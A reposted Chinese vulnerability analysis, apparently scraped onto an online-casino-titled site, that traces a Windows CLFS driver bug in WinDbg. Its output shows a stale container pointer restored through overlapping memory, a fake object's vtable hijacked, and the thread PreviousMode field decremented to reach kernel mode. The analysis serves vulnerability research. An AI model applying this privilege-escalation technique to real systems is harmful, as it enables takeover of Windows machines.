[原创]年终clfs漏洞汇总分析 | 宜武汇-ag真人国际厅网站

bp clfs!cclfsbasefilepersisted::loadcontainerq

bp clfs!cclfsbasefile::getsymbol

0: kd> r

rax=0000000000000000 rbx=0000000000000000 rcx=ffffc784287c1000

rdx=0000000000001528 rsi=ffffdc0782e5c398 rdi=0000000000001528

rip=fffff80026ee2670 rsp=ffffb30823028f88 rbp=ffffb30823029760

 r8=0000000000000000  r9=ffffb30823029050 r10=fffff800272a7040

r11=ffffb308230289e0 r12=0000000000000000 r13=0000000000000000

r14=ffffc784287c1000 r15=ffffb30823029198

iopl=0         nv up ei pl nz na po nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040206

clfs!cclfsbasefile::getsymbol:

fffff800`26ee2670 48895c2418      mov     qword ptr [rsp+18h],rbx ss:0018:ffffb308`23028fa0=ffffdc0782e5c398

2: kd> k

 # child-sp          retaddr           call site

00 ffffb308`23704f88 fffff800`26ee7294 clfs!cclfsbasefile::getsymbol

01 ffffb308`23704f90 fffff800`26eb3156 clfs!cclfsbasefilepersisted::loadcontainerq+0x2a4

02 ffffb308`23705100 fffff800`26edeb7b clfs!cclfslogfcbphysical::initialize+0x6da

03 ffffb308`23705240 fffff800`26ee0abb clfs!cclfsrequest::create+0x4ef

04 ffffb308`23705390 fffff800`26ee0887 clfs!cclfsrequest::dispatch+0x97

05 ffffb308`237053e0 fffff800`26ee07d7 clfs!clfsdispatchiorequest+0x87

0: kd> gu

0: kd> dq poi(ffffb30823029050)

ffffdc07`82e5d598  00000030`00000000 00000000`00100000

//pcontainer指针

ffffdc07`82e5d5a8  00000000`00000000 00000000`40000000

ffffdc07`82e5d5b8  00000002`00000001 00000000`00000000

//在pcontainer指针字段所在地址(偏移+0x18)下硬件写入断点(ba w8)

ba w8  ffffdc07`82e5d598+18

breakpoint 3 hit

clfs!cclfsbasefilepersisted::loadcontainerq+0x4e5:

fffff800`26ee74d5 4885c9          test    rcx,rcx

//loadcontainerq中将container_context中pcontainer指针覆盖为新申请的容器对象实例指针

0: kd> dps  poi(ffffdc07`82e5d5b0)

ffffdc07`8291bab0  fffff800`26ec35f0 clfs!cclfscontainer::`vftable'

ffffdc07`8291bab8  00000000`00000000

ffffdc07`8291bac0  00000000`00000000

0: kd> dq ffffdc07`82e5d598

ffffdc07`82e5d598  00000030`00000000 00000000`00100000

ffffdc07`82e5d5a8  00000000`00000000 ffffdc07`8291bab0

ffffdc07`82e5d5b8  00000002`00000001 00000000`00000000

1: kd> g

breakpoint 3 hit

clfs!cclfslogfcbphysical::flushmetadata+0x5d:

fffff800`26eb158d 488b83a8010000  mov     rax,qword ptr [rbx+1a8h]

1: kd> r

rax=0000000040000000 rbx=ffffc784288ed000 rcx=ffff80002b167180

rdx=0000000000000031 rsi=ffffc7842a3d2930 rdi=0000000000000000

rip=fffff80026eb158d rsp=ffffb30823029680 rbp=0000000000000001

 r8=0000000000000804  r9=ffffdc0782e5d590 r10=0000000000000000

r11=ffffdc0782e5c000 r12=ffffc784297e9dc8 r13=0000000000000000

r14=ffffc784297e9ee8 r15=ffffc78422c79c01

iopl=0         nv up ei ng nz na po nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040286

clfs!cclfslogfcbphysical::flushmetadata+0x5d:

fffff800`26eb158d 488b83a8010000  mov     rax,qword ptr [rbx+1a8h] ds:002b:ffffc784`288ed1a8=0000000200000001

1: kd> k

 # child-sp          retaddr           call site

00 ffffb308`23029680 fffff800`26ef1503 clfs!cclfslogfcbphysical::flushmetadata+0x5d

01 ffffb308`230296d0 fffff800`26eeea25 clfs!cclfslogfcbvirtual::cleanup+0x213

02 ffffb308`23029760 fffff800`26eee939 clfs!cclfslogccb::cleanup+0xb1

03 ffffb308`230297b0 fffff800`26ee0955 clfs!cclfsrequest::cleanup+0x65

0c 0000000a`dc5ff920 00000000`00000000 0x00007ff8`d566a395

//flushmetadata中获取的clientcontext与clfs_container_context是重叠的内存. 伪代码如下: cltctx->llcreatetime.quadpart = that->field_ctratetime_1a0; 这次写入把container_context中的pcontainer指针重新覆盖为旧值

1: kd>  dq ffffdc07`82e5d598

ffffdc07`82e5d598  00000030`00000000 00000000`00100000

ffffdc07`82e5d5a8  00000000`00000000 00000000`40000000

ffffdc07`82e5d5b8  00000002`00000001 00000000`00000000

3: kd> kv

 # child-sp          retaddr           : args to child                                                           : call site

00 ffffb308`23029618 fffff800`26eb8655 : ffffc784`287c1000 ffffc784`288ed000 00000000`00000000 fffff800`26eceb01 : clfs!cclfscontainer::close

01 ffffb308`23029620 fffff800`26eb87b6 : ffffdc07`82e5d598 ffffc784`288ed000 fffff800`26eceb20 00000000`00000000 : clfs!cclfslogfcbphysical::closecontainers+0x69

02 ffffb308`23029650 fffff800`26eb8761 : 00000000`00000000 ffffc784`288ed000 fffff800`26eceb20 ffffc784`288ed2f8 : clfs!cclfslogfcbphysical::finalize+0x42

03 ffffb308`23029680 fffff800`26eb9889 : ffffc784`2883d801 ffffc784`288ed250 00000000`00000000 ffffc784`297e9e28 : clfs!cclfslogfcbphysical::release+0xb1

04 ffffb308`230296e0 fffff800`26eddfd2 : ffffc784`2883d830 ffffc784`2883d801 00000000`00000000 ffffc784`2883d830 : clfs!cclfslogfcbvirtual::release+0x69

05 ffffb308`23029720 fffff800`26ee0908 : ffffc784`2883d830 ffffc784`22c79c80 ffffc784`2883d830 00000000`00000000 : clfs!cclfsrequest::close+0xd6

06 ffffb308`23029770 fffff800`26ee07d7 : ffffc784`2883d830 ffffc784`2883d830 00000000`00000000 fffff800`27cf4204 : clfs!clfsdispatchiorequest+0x108

3: kd> r

//rcx就是pcontainer指针, 此时已被覆盖回旧值

rax=0000000000000000 rbx=ffffc784288ed000 rcx=0000000040000000

rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000

rip=fffff80026eeb438 rsp=ffffb30823029618 rbp=ffffdc0782e5d598

 r8=ffffb30823029550  r9=ffffdc0782e5c070 r10=0000000000000000

r11=ffffdc0782e5c000 r12=0000000000000000 r13=0000000000000001

r14=fffff80026eceb20 r15=ffffc78422c79c80

iopl=0         nv up ei pl nz na po nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040206

clfs!cclfscontainer::close:

fffff800`26eeb438 48895c2408      mov     qword ptr [rsp+8],rbx ss:0018:ffffb308`23029620=ffffc784287c1000

3: kd> dq 0000000040000000

00000000`40000000  0000010d`844b0000 00000000`00000000

00000000`40000010  00000000`00000000 00000000`00000000

00000000`40000020  00000000`0000009c 00000000`00000000

//ullkthreadaddress+dwthreadpremodepos 0x30;就是thread的previousmode字段地址

00000000`40000030  ffffc784`29c79322 00000000`00000000

//threadpremode地址

00000000`40000030  ffffc784`26d0b2e2 00000000`00000000

//通过伪造对象(rcx=pcontainer旧值)的虚表进行间接调用, rax为被调用的函数地址

rax=fffff80026f10190 rbx=ffffc784288ed000 rcx=0000000040000000

rdx=00000000746c6644 rsi=0000000000000000 rdi=0000000000000000

rip=fffff80026eb8660 rsp=ffffb30823029620 rbp=ffffdc0782e5d598

 r8=ffffc7842a3ce08e  r9=0000000000000006 r10=fffff80027216270

r11=ffffc78426d0b080 r12=0000000000000000 r13=0000000000000001

r14=fffff80026eceb20 r15=ffffc78422c79c80

iopl=0         nv up ei ng nz na pe nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040282

clfs!cclfslogfcbphysical::closecontainers+0x74:

fffff800`26eb8660 ff157abf0100    call    qword ptr [clfs!_guard_dispatch_icall_fptr (fffff800`26ed45e0)] ds:002b:fffff800`26ed45e0={clfs!guard_dispatch_icall_nop (fffff800`26ebd4e0)}

5: kd> ln rax

(fffff800`26f10190)   clfs!clfssetendoflog   |  (fffff800`26f101f0)   clfs!clfssetlogfileinformation

4: kd> !thread

thread ffffc78429c790c0  cid 15bc.08e4  teb: 00000040e33dc000 win32thread: 0000000000000000 running on processor 4

child-sp          retaddr           : args to child                                                           : call site

ffffb308`23835618 fffff800`26eb8655 : ffffc784`280ef000 ffffc784`29603000 00000000`00000000 fffff800`26eceb01 : clfs!cclfscontainer::close

obfdereferenceobject递减thread的previousmode字段地址处的值, 从而将当前线程模式改为内核模式

4: kd> dt nt!_kthread ffffc78429c790c0  -y previous

    0x232 previousmode : 0 ''

原文链接:https://bbs.kanxue.com/thread-275566.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/原创年终clfs漏洞汇总分析/


